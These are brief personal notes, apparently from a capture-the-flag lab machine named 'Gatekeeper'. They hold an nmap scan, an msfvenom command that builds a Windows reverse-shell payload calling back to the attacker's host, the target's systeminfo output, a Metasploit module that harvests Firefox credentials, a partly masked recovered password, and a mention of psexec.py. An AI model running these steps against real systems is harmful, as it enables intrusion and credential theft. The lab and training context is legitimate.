# Gate keeper

## Scan nmap :
nmap -sC -sV -oN nmap/initial 10.10.96.244

msfvenom -p windows/shell_reverse_tcp LHOST='10.9.2.251' LPORT=1337 EXITFUNC=thread -b "\x00\x0a" -f py

Host Name:                 GATEKEEPER
OS Name:                   Microsoft Windows 7 Professional 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-153-2376003-86370
Original Install Date:     4/19/2020, 11:55:26 AM
System Boot Time:          7/18/2021, 1:04:26 AM
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
BIOS Version:              Xen 4.11.amazon, 8/24/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     1,024 MB
Available Physical Memory: 565 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 1,450 MB
Virtual Memory: In Use:    598 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\GATEKEEPER
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB2999226
                           [03]: KB4012212
                           [04]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: AWS PV Network Device
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.0.1
                                 IP address(es)
                                 [01]: 10.10.96.244
                                 [02]: fe80::9944:656e:d5a5:dc86

nothing usefull...
run post/multi/gather/firefox_creds

got 
mayor:8CL7O1N78Mdr***

using the psexec.py